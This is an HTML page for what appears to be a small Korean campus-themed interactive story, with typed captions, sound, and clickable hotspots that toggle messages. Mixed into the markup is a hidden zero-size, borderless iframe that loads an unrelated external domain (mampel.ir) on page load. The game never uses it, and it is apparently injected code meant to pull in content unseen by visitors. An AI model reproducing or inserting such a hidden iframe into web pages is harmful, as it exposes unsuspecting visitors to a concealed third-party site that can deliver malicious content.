<!DOCTYPE html>
<html>
<style>
	body{background-color: #484535;}
	#backk{width: auto; height: 100%; animation:start 13s alternate;}
	#backk img{width: 1250px; height: auto;}
	#po{top: 300px; left: 40%;}
	#poo{top: 350px; left: 37%; font-weight: 10px; font-size: 3em;}
	#poom{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 33%;}
	#poom2{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 33%;}

	#bx { position: absolute; bottom: 0%; left: 30%; opacity: 0;}
	#bx img{ width: 60%; height: auto;  }

	#floor { position: absolute; z-index: 99;cursor: pointer; top: 50%; left: 40%; display:none;}
	#floor img{ position: absolute; width: 300px; height: 200px;z-index: 99;cursor: pointer;}
	#floo { position: absolute; z-index: 99;cursor: pointer; top: 20%; left: 60%;display:none; }
	#floo img{ position: absolute;  width: 300px; height: 200px;z-index: 99;cursor: pointer;}

	#lefts{top: 50%; left: 18%; position: absolute; cursor: pointer;display: none; animation: here 3s alternate;}
	#lefts img{width: 50px; height: auto; }
	#rights{top: 50%; right: 18%; position: absolute;display: none; animation: heree 3s alternate;}
	#rights img{width: 50px; height: auto;cursor: pointer; }

	

@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }
@keyframes start{
			0%{opacity: 0;}
			90%{opacity: 0;}
			
			100%{opacity: 1;}
		}


h1 { 
	color: #26241B;
	border-right: .2em solid #26241B;
	 
	width: 20ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 7s steps(21, end),
	           blink-caret .5s step-end infinite alternate;
}
h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 40ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 3s steps(40, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}




@keyframes here{
			0%{left: 20%;}
			
			100%{left: 18%;}
		}

@keyframes heree{
			0%{right: 20%;}
			
			100%{right: 18%;}
		}		
</style>

<head>
	<title></title>
</head>

<body>
	
		<audio src="typing.mp3" autoplay="true" preload="auto">
	</audio>
	<audio id="floormp">
		<source src="floor.mp3" type="audio/mpeg">
	</audio>


	  <h1 id="po">10월31일 오전 7시 34분</h1>
	  <h1 id="poo">3공학관 디자인 학과</h1>
	  <h2 id="poom">건축학과로 가는길이다. 지금은 갈 필요가 없다.</h2>
	  <h2 id="poom2">7층으로 가는길이다. 지금은 갈 필요가 없다.</h2>



<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>

	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<div id="lefts">
		<img src="here.png">
	</div>
	<div id="rights">
		<img src="orhere.png">
	</div>

	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="floor">
		<img src="blank.png">
	</div>
	<div id="floo">
		<img src="blank.png">
	</div>

<script type="text/javascript">


var toggle = "off";
	
var toggle = "off";
	var clickNumber = 0;
	floor.onclick = function(){
		
		if(toggle == "off"){
			floormp.play();
			toggle = "on";
			bx.style.opacity = 1;
			poom.style.display = "inline";
			poom2.style.display = "none";}
			else{
			toggle = "off";
			bx.style.opacity = 0;
			poom.style.display = "none";
			
		}
	}

	floo.onclick = function(){
		
		if(toggle == "off"){
			poom.style.display = "none";
			floormp.play();
			toggle = "on";
			bx.style.opacity = 1;
			poom2.style.display = "inline";}
			else{
			toggle = "off";
			bx.style.opacity = 0;
			poom2.style.display = "none";
			
		}
	}



	function hideDiv (){ 
  document.getElementById("po").style.display="none"; 
  document.getElementById("poo").style.display="none";
  document.getElementById("floor").style.display="inline";
  document.getElementById("floo").style.display="inline";  

} 
self.setTimeout("hideDiv()",13000); // 사건번호

function lookDiv (){ 
  document.getElementById("lefts").style.display="inline"; 
  document.getElementById("rights").style.display="inline"; 

} 
self.setTimeout("lookDiv()",13000);



</script>
</body>
</html>